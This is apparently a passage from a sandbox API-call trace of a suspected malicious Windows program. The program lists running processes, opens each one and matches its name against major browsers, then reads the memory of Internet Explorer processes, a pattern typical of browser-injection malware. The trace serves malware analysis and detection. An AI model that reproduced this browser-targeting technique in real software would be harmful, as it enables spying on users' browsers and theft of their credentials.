	[0213.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.295] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.295] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.295] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x400c
	[0213.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.298] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.298] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4010
	[0213.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.300] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.301] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.301] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.301] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0213.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4014
	[0213.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.303] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0213.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.303] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.304] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0213.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.304] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.305] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0213.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4018
	[0213.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.307] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0213.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.308] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.309] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0213.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.310] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.311] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0213.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x401c
	[0213.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.313] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.314] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.314] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.314] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.314] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0213.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4020
	[0213.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.316] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0213.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.316] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.316] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0213.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.317] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.317] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0213.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0213.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0213.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4024
	[0213.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.319] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0213.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.319] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.320] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0213.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.321] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.321] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0213.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4028
	[0213.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.322] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0213.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.322] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.323] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0213.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.323] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.323] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0213.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x402c
	[0213.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.324] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0213.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.325] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.325] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0213.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.325] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.325] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0213.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4030
	[0213.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.326] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0213.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.327] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.327] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0213.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.327] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0213.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4034
	[0213.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.328] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0213.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.329] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.329] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0213.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.330] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0213.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4038
	[0213.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.332] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0213.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.332] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.333] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0213.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.333] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0213.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x403c
	[0213.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.334] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0213.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.334] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.335] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0213.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.335] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0213.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4040
	[0213.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.336] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0213.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.337] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.337] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0213.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.338] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.338] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0213.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4044
	[0213.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.339] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0213.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.339] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.339] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0213.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.340] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0213.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4048
	[0213.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.341] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0213.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.341] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.341] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0213.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.341] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0213.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x404c
	[0213.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.342] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0213.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.343] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.343] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0213.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.344] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0213.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4050
	[0213.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.345] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0213.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.345] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.346] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0213.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.347] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.347] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0213.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4054
	[0213.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.348] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0213.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.348] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.349] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0213.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.349] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0213.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4058
	[0213.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.350] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0213.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.351] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.352] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0213.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.352] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.353] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0213.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x405c
	[0213.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.354] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0213.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.354] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.355] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0213.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.355] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.355] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4060
	[0213.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.356] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.356] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.357] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.357] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.357] NtQueryInformationProcess (in: ProcessHandle=0x4060, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.357] ReadProcessMemory (in: hProcess=0x4060, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.357] ReadProcessMemory (in: hProcess=0x4060, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.357] ReadProcessMemory (in: hProcess=0x4060, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.357] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0213.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4064
	[0213.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.359] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.359] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.359] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
